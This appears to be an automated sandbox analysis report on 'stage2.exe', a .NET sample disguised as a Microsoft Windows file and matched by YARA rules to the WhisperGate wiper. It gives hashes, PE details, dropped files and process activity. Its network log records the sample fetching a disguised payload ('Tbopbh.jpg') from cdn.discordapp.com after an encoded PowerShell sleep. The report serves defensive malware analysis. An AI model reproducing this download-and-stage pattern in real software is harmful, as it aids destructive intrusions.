                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview: 1
                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kw2ltvwn.ds0.psm1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview: 1
                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0qgkhds.0yb.ps1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview: 1
                                                      C:\Users\user\Documents\20220117\PowerShell_transcript.082561.7m2ZOLtQ.20220117022409.txt
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):975
                                                      Entropy (8bit):5.124059992328832
                                                      Encrypted:false
                                                      SSDEEP:24:BxSAexvBnGx2DOXUWj5i5WiHjeTKKjX4CIym1ZJXnBWnxSAZgS:BZavhGoOziqDYB1ZdB4ZZgS
                                                      MD5:BBD1DFD615841C5948E4F29E6C82F116
                                                      SHA1:DD38516AE01450D37B9C323A441FCAA51E9D948C
                                                      SHA-256:46C7D5E25E092B25F45D7832CCE18B4FDBE5F3B2F30FDB9E7F05172A6F1CE603
                                                      SHA-512:F727C3068F7F45758F571F1ED85C002EED9D1E49074F2277B1A0D25B18D68D270054762D108CEB3B5ABE264520B6A72E8AFB7AB401C999981EE3F0AD72466E49
                                                      Malicious:false
                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20220117022418..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 082561 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==..Process ID: 7160..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220117022419..**********************..PS>Start-Sleep -s 10..**********************..Command start time: 20220117022742..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20220117022742..**********************..
                                                      C:\Users\user\Documents\20220117\PowerShell_transcript.082561.vEnUoizJ.20220117022446.txt
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):975
                                                      Entropy (8bit):5.129269732116244
                                                      Encrypted:false
                                                      SSDEEP:24:BxSAixvBnGx2DOXUWj5i5WUHjeTKKjX4CIym1ZJX2nxSAZW:BZevhGoOzUqDYB1ZOZZW
                                                      MD5:B5EF0789C51BC25618A8B8380106F073
                                                      SHA1:C4B515F96607777B8ECCF44C84F014744D7C8AD3
                                                      SHA-256:6CF2DBD9945C70552992020AA9F6F0028209C8EAE18D1B080ABF9E75C5A25750
                                                      SHA-512:2D04D6AF284F7D97C3157A211B85A21AD8ACBF760D5A10C101A67212EE44204B3FFF9DBB37892258D50CB32B053CFDBE7635C76A93E2D65113509325A5F6136D
                                                      Malicious:false
                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20220117022458..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 082561 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==..Process ID: 7140..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220117022458..**********************..PS>Start-Sleep -s 10..**********************..Command start time: 20220117023016..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20220117023016..**********************..
                                                      C:\Windows\appcompat\Programs\Amcache.hve
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):1572864
                                                      Entropy (8bit):4.2717574458854735
                                                      Encrypted:false
                                                      SSDEEP:12288:7XBO1fBqU8EJBPgZy54wpZkRyo2Fqhn4agUVxYqolztxIQaLyHYaPeK:jBO1fBqU8EJBPgbE
                                                      MD5:374743508B8FDB08634F0B0FBB5571B8
                                                      SHA1:B86A1ED991E72FC4B4D930AB33BBA15CB1B0FB26
                                                      SHA-256:45420FB69A145CE87CB8B4B442D93AAF2A167AD97FF2C0B02A4FC7F6C5F1E1A8
                                                      SHA-512:016B1471EDF41C095AB092B75AC2C12FD86A1A16EC10929DB709B0276A01707FA3ABA4D5BA41784C5F49E41490EF1AAD312F3F506013F62F0FD163B06730630D
                                                      Malicious:false
                                                      Preview: regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..I.................................................................................................................................................................................................................................................................................................................................................j.B.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):24576
                                                      Entropy (8bit):4.038364930198759
                                                      Encrypted:false
                                                      SSDEEP:384:FOl/5Rftx1GPJ4XZsFknM7ktPBqXWSeq5QMVyi6+/ml4Lk4KZd1DoXzkNKcmLzdE:olBRftx18J4XuFkM7KBqX9eq5QMVyi6e
                                                      MD5:1E6B5359110A436CD426A10C18A64BD9
                                                      SHA1:233D103FF0DF3EFD1788D1793E2DC82660BE1646
                                                      SHA-256:6EC713C240E5C0E01BEC5D131A8263237F04CB2D77EC465FC7914CA090BB8DEC
                                                      SHA-512:339ADC6FA78B9DD339F29002B4E53BDA4F70611231379A6BA638F92656B60F3DC1E6573D76DAF5A76177BD6EA3E451147A01A59707BEB75B1542CF4DA37AD933
                                                      Malicious:false
                                                      Preview: regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..I.................................................................................................................................................................................................................................................................................................................................................l.B.HvLE.^......Y...........&I/......ME............0................... ..hbin................p.\..,..........nk,...I..................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ...I......... ........................... .......Z.......................Root........lf......Root....nk ...I......................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):5.133399721297699
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                      • Win32 Executable (generic) a (10002005/4) 49.96%
                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:stage2.exe
                                                      File size:214944
                                                      MD5:14c8482f302b5e81e3fa1b18a509289d
                                                      SHA1:16525cb2fd86dce842107eb1ba6174b23f188537
                                                      SHA256:dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
                                                      SHA512:fdaaac4ee73db90f69dc43a20f24d8f80a2f659288d28538c6fd1946b8861bb161b41ad3bcd65d16843cd21350e95c606f991a990110e100029b58abce978353
                                                      SSDEEP:3072:vf1GlJZUnjNbGgNQfYySIHiP1WLz4PcSOvG2jxZ:FbGoJ8iP19PjmGyf
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:E.a.................B...D......Na... ........@.. ....................................@................................

                                                      File Icon

                                                      Icon Hash:b270f086c6c2caf0

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x40614e
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0x61DC453A [Mon Jan 10 14:39:54 2022 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:v4.0.30319
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Authenticode Signature

                                                      Signature Valid:false
                                                      Signature Issuer:CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                      Signature Validation Error:The digital signature of the object did not verify
                                                      Error Number:-2146869232
                                                      Not Before, Not After
                                                      • 12/15/2020 1:29:14 PM 12/2/2021 1:29:14 PM
                                                      Subject Chain
                                                      • CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                      Version:3
                                                      Thumbprint MD5:1A1395EF5FC0A90A5B83AC4B531EEAC9
                                                      Thumbprint SHA-1:312860D2047EB81F8F58C29FF19ECDB4C634CF6A
                                                      Thumbprint SHA-256:416F4C0A00D1C4108488A04C2519325C5AA13BC80D0C017C45B00B911B8370A9
                                                      Serial:33000002ED2C45E4C145CF48440000000002ED

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x61000x4b.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x24118.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x288000xbfa0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e0000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x41540x4200False0.578006628788data5.88284633145IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x80000x241180x24200False0.156378406142data3.54772483226IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x2e0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountry
                                                      RT_ICON0x82500x1d4fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                      RT_ICON0x9fa00x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                      RT_ICON0x1a7c80x94a8data
                                                      RT_ICON0x23c700x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4043309055, next used block 4294967047
                                                      RT_ICON0x27e980x25a8data
                                                      RT_ICON0x2a4400x10a8data
                                                      RT_ICON0x2b4e80x468GLS_BINARY_LSB_FIRST
                                                      RT_GROUP_ICON0x2b9500x68data
                                                      RT_VERSION0x2b9b80x3f4data
                                                      RT_MANIFEST0x2bdac0x36aXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Version Infos

                                                      DescriptionData
                                                      Translation0x0000 0x04b0
                                                      LegalCopyright . .
                                                      Assembly Version10.0.18362.1500
                                                      InternalNameTbopbh.exe
                                                      FileVersion10.0.18362.1500
                                                      CompanyNameMicrosoft Corporation
                                                      LegalTrademarks
                                                      Comments
                                                      ProductName Microsoft Windows
                                                      ProductVersion10.0.18362.1500
                                                      FileDescription
                                                      OriginalFilenameTbopbh.exe

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 17, 2022 02:25:23.920696974 CET49752443192.168.2.3162.159.130.233
                                                      Jan 17, 2022 02:25:23.920753956 CET44349752162.159.130.233192.168.2.3
                                                      Jan 17, 2022 02:25:23.920846939 CET49752443192.168.2.3162.159.130.233
                                                      Jan 17, 2022 02:25:23.977926016 CET49752443192.168.2.3162.159.130.233
                                                      Jan 17, 2022 02:25:23.977962017 CET44349752162.159.130.233192.168.2.3
                                                      Jan 17, 2022 02:25:24.031980991 CET44349752162.159.130.233192.168.2.3
                                                      Jan 17, 2022 02:25:24.032147884 CET49752443192.168.2.3162.159.130.233
                                                      Jan 17, 2022 02:25:24.036612034 CET49752443192.168.2.3162.159.130.233
                                                      Jan 17, 2022 02:25:24.036638021 CET44349752162.159.130.233192.168.2.3
                                                      Jan 17, 2022 02:25:24.036952019 CET44349752162.159.130.233192.168.2.3
                                                      Jan 17, 2022 02:25:24.083822966 CET49752443192.168.2.3162.159.130.233
                                                      Jan 17, 2022 02:25:24.284538031 CET49752443192.168.2.3162.159.130.233
                                                      Jan 17, 2022 02:25:24.326009989 CET44349752162.159.130.233192.168.2.3
                                                      Jan 17, 2022 02:25:24.443249941 CET44349752162.159.130.233192.168.2.3
                                                      Jan 17, 2022 02:25:24.443366051 CET44349752162.159.130.233192.168.2.3
                                                      Jan 17, 2022 02:25:24.443631887 CET49752443192.168.2.3162.159.130.233
                                                      Jan 17, 2022 02:25:24.450921059 CET49752443192.168.2.3162.159.130.233

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 17, 2022 02:25:23.882636070 CET4957253192.168.2.38.8.8.8
                                                      Jan 17, 2022 02:25:23.905548096 CET53495728.8.8.8192.168.2.3

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Jan 17, 2022 02:25:23.882636070 CET192.168.2.38.8.8.80xa202Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      Jan 17, 2022 02:25:23.905548096 CET8.8.8.8192.168.2.30xa202No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                      Jan 17, 2022 02:25:23.905548096 CET8.8.8.8192.168.2.30xa202No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                      Jan 17, 2022 02:25:23.905548096 CET8.8.8.8192.168.2.30xa202No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                      Jan 17, 2022 02:25:23.905548096 CET8.8.8.8192.168.2.30xa202No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                      Jan 17, 2022 02:25:23.905548096 CET8.8.8.8192.168.2.30xa202No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • cdn.discordapp.com

                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.349752162.159.130.233443C:\Users\user\Desktop\stage2.exe
                                                      TimestampkBytes transferredDirectionData
                                                      2022-01-17 01:25:24 UTC0OUTGET /attachments/928503440139771947/930108637681184768/Tbopbh.jpg HTTP/1.1
                                                      Host: cdn.discordapp.com
                                                      Connection: Keep-Alive
                                                      2022-01-17 01:25:24 UTC0INHTTP/1.1 403 Forbidden
                                                      Date: Mon, 17 Jan 2022 01:25:24 GMT
                                                      Content-Type: application/xml; charset=UTF-8
                                                      Content-Length: 223
                                                      Connection: close
                                                      CF-Ray: 6cebca1adc534a68-FRA
                                                      Cache-Control: private, max-age=0
                                                      Expires: Mon, 17 Jan 2022 01:25:24 GMT
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: MISS
                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                      X-GUploader-UploadID: ADPycds5oM3NpZ9AylXZpGVOB9ntKzX9oHiZ36JltKQWVbDwXaSj4icPcReICi5s5vNaRHT4QvI_mIj3uwpfm47zzoOikFzaRA
                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RfbSACd0FpP8AarT40rUdyTU16oiVuL8ktNluhrU0TLjW%2BTGsBj6c0zZg%2FW2Tg%2BHLybyYjE0%2BAX8GvswXYherK%2BwZycY1622%2BqIiXLXq84wLdlCovP450WnSVpVht58ekJr99w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      2022-01-17 01:25:24 UTC1INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 41 63 63 65 73 73 44 65 6e 69 65 64 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 41 6e 6f 6e 79 6d 6f 75 73 20 63 61 6c 6c 65 72 20 64 6f 65 73 20 6e 6f 74 20 68 61 76 65 20 73 74 6f 72 61 67 65 2e 6f 62 6a 65 63 74 73 2e 67 65 74 20 61 63 63 65 73 73 20 74 6f 20 74 68 65 20 47 6f 6f 67 6c 65 20 43 6c 6f 75 64 20 53 74 6f 72 61 67 65 20 6f 62 6a 65 63 74 2e 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                      Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Error><Code>AccessDenied</Code><Message>Access denied.</Message><Details>Anonymous caller does not have storage.objects.get access to the Google Cloud Storage object.</Details></Error>


                                                      Code Manipulations

                                                      Statistics

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      Analysis Process: stage2.exe PID: 7084 Parent PID: 6084

                                                      General

                                                      Start time:02:24:07
                                                      Start date:17/01/2022
                                                      Path:C:\Users\user\Desktop\stage2.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\stage2.exe"
                                                      Imagebase:0xea0000
                                                      File size:214944 bytes
                                                      MD5 hash:14C8482F302B5E81E3FA1B18A509289D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: APT_HKTL_Wiper_WhisperGate_Jan22_2, Description: Detects unknown wiper malware, Source: 00000001.00000000.439887170.0000000000EA2000.00000002.00020000.sdmp, Author: Florian Roth
                                                      • Rule: APT_HKTL_Wiper_WhisperGate_Jan22_2, Description: Detects unknown wiper malware, Source: 00000001.00000002.480052318.0000000000EA2000.00000002.00020000.sdmp, Author: Florian Roth
                                                      • Rule: APT_HKTL_Wiper_WhisperGate_Jan22_2, Description: Detects unknown wiper malware, Source: 00000001.00000000.437666808.0000000000EA2000.00000002.00020000.sdmp, Author: Florian Roth
                                                      • Rule: APT_HKTL_Wiper_WhisperGate_Jan22_2, Description: Detects unknown wiper malware, Source: 00000001.00000000.271766492.0000000000EA2000.00000002.00020000.sdmp, Author: Florian Roth
                                                      Reputation:low

                                                      Analysis Process: powershell.exe PID: 7160 Parent PID: 7084

                                                      General

                                                      Start time:02:24:08
                                                      Start date:17/01/2022
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
                                                      Imagebase:0x13a0000
                                                      File size:430592 bytes
                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Analysis Process: conhost.exe PID: 6176 Parent PID: 7160

                                                      General

                                                      Start time:02:24:08
                                                      Start date:17/01/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7f20f0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Analysis Process: powershell.exe PID: 7140 Parent PID: 7084

                                                      General

                                                      Start time:02:24:44
                                                      Start date:17/01/2022
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
                                                      Imagebase:0x13a0000
                                                      File size:430592 bytes
                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Analysis Process: conhost.exe PID: 6424 Parent PID: 7140

                                                      General

                                                      Start time:02:24:44
                                                      Start date:17/01/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7f20f0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Analysis Process: WerFault.exe PID: 492 Parent PID: 7084

                                                      General

                                                      Start time:02:25:27
                                                      Start date:17/01/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396
                                                      Imagebase:0x10a0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Disassembly

                                                      Code Analysis

                                                      Reset < >